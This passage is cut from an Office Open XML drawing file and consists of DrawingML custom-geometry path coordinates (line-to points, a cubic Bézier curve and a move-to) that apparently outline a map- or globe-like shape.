                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4235" y="2680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4207" y="2666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329" y="2533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4387" y="2469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488" y="2377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595" y="2272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4715" y="2171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4764" y="2094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4685" y="2141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4619" y="2168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4584" y="2187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4531" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4488" y="2239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4451" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4419" y="2264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4422" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4370" y="2276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4313" y="2315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4264" y="2357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4200" y="2397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4144" y="2427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4106" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4045" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030" y="2535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3932" y="2623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3855" y="2681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3792" y="2734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3740" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3742" y="2793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3720" y="2825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3638" y="2910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3537" y="3023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3553" y="3038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3515" y="3094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3564" y="3072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3565" y="3097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3653" y="3027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3708" y="3013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3723" y="3035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3754" y="3023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3690" y="3124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3702" y="3168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3771" y="3129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3831" y="3106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3781" y="3213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3638" y="3404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3656" y="3451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3643" y="3483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3670" y="3506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3665" y="3538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3585" y="3631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3547" y="3683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3414" y="3777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313" y="3878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3195" y="4011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3109" y="4117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3070" y="4193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3006" y="4265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2961" y="4343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2899" y="4405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2868" y="4456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799" y="4526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2719" y="4614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2702" y="4609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2650" y="4634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2614" y="4659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2687" y="4676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2680" y="4713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2735" y="4681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2803" y="4579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2865" y="4568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2818" y="4668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2747" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2784" y="4750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2808" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2897" y="4595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2956" y="4499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3030" y="4385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3043" y="4397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3079" y="4356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3106" y="4281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3245" y="4116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="4010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3466" y="3888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3542" y="3826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3574" y="3818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3638" y="3781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3651" y="3829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3604" y="3910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3601" y="3897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3599" y="3895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3555" y="3915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3501" y="3964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3547" y="3962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3503" y="4031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3459" y="4057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3390" y="4129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3387" y="4116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267" y="4247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200" y="4356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3138" y="4439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3065" y="4557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3028" y="4616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2981" y="4669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2966" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2942" y="4725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2907" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826" y="4786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767" y="4834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2713" y="4920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2687" y="4940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2675" y="4964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2639" y="4996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560" y="5099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2498" y="5181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2419" y="5260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321" y="5373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="5572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350" y="5447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2414" y="5424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2368" y="5545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2432" y="5489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2474" y="5410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2537" y="5311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2557" y="5329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621" y="5235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2697" y="5158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2719" y="5156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2648" y="5257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2639" y="5312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651" y="5350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2730" y="5228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2744" y="5326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727" y="5387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2717" y="5450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2692" y="5469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2633" y="5545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2692" y="5577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2725" y="5590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2727" y="5705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2757" y="5698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2801" y="5580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2848" y="5531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2922" y="5445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3011" y="5413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3064" y="5425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3220" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3207" y="5378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3235" y="5403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269" y="5376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3368" y="5380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3444" y="5363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3463" y="5437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3412" y="5477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3387" y="5646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3358" y="5695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3308" y="5639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3281" y="5641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3249" y="5772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3186" y="5797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3163" y="5871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3254" y="5940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3293" y="6025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3341" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3319" y="5917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3346" y="5848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3489" y="5821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3510" y="5900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3565" y="5927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3589" y="5991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3629" y="6053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3599" y="6078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3516" y="5989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3473" y="6082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3346" y="6094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314" y="6043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3250" y="6184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3224" y="6333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3143" y="6546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114" y="6617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112" y="6683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082" y="6780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005" y="6883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2949" y="6918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2853" y="6863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843" y="6769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2799" y="6671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2820" y="6484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880" y="6237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2860" y="6075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816" y="5989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2732" y="5935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2747" y="5732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2655" y="5764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658" y="5612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2552" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2490" y="5703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2402" y="5730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333" y="5861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2217" y="6026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2214" y="6141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2151" y="6301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2165" y="6361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212" y="6341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212" y="6460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156" y="6605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2182" y="6755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2254" y="6763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239" y="6880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257" y="6933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2210" y="6937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2166" y="7028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2118" y="7050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038" y="7149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2033" y="7151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1953" y="7179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1863" y="7235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1862" y="7233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1835" y="7247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1756" y="7312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1707" y="7337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1702" y="7353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1666" y="7359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1636" y="7332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634" y="7236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651" y="7119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1619" y="7130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="7041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1675" y="6947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="6856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638" y="6843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1609" y="6790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1626" y="6720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="6573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1693" y="6435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1707" y="6287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1744" y="6225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1771" y="6100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1793" y="6048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1799" y="6006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1852" y="5922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1900" y="5750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1904" y="5688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1875" y="5656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1836" y="5669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1757" y="5772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1727" y="5765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1719" y="5737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1798" y="5567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1887" y="5370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1941" y="5252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044" y="5116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2143" y="4930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2197" y="4826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2208" y="4789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299" y="4634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2392" y="4513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2421" y="4457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2485" y="4392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2501" y="4417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2582" y="4358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2626" y="4302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2673" y="4267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2700" y="4277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2725" y="4255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2729" y="4200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2781" y="4163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2830" y="4084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2845" y="4006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2877" y="3944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926" y="3887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2988" y="3782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005" y="3720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052" y="3661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3153" y="3508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3254" y="3362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3294" y="3291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3303" y="3261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3372" y="3173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3399" y="3121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3434" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3542" y="2971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3617" y="2890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3708" y="2809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3774" y="2745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3749" y="2756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3722" y="2764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3757" y="2725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3766" y="2697"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5653" y="1056"/>
                  <a:pt x="8109" y="54"/>
                  <a:pt x="10800" y="54"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9785" y="539"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9607" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9440" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9315" y="581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9315" y="636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9319" y="683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9391" y="715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9300" y="788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9297" y="833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9336" y="874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9307" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9216" y="966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9137" y="1008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9091" y="1025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8994" y="1114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8985" y="1207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8952" y="1254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8884" y="1281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8740" y="1374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8662" y="1490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8612" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8689" y="1577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8831" y="1512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8822" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8908" y="1604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8788" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8709" y="1597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8640" y="1656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8748" y="1692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8876" y="1695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8965" y="1678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8969" y="1707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8834" y="1729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8883" y="1756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9012" y="1767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8952" y="1801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8910" y="1843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8937" y="1874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9031" y="1872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8950" y="1927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9100" y="1953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9071" y="1981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9181" y="2033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9305" y="2032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9287" y="2086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9241" y="2119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9357" y="2141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9492" y="2222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9548" y="2283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9608" y="2355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9671" y="2325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9615" y="2385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9632" y="2410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9642" y="2522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9713" y="2543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9793" y="2517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9844" y="2424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9857" y="2362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9899" y="2424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9958" y="2446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9965" y="2397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10068" y="2397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10137" y="2355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10164" y="2367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10056" y="2426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9982" y="2469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990" y="2523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10192" y="2537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10351" y="2491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10411" y="2461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10413" y="2414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10490" y="2400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10536" y="2320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10522" y="2272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10436" y="2224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10505" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10544" y="2252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10617" y="2286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10669" y="2217"/>
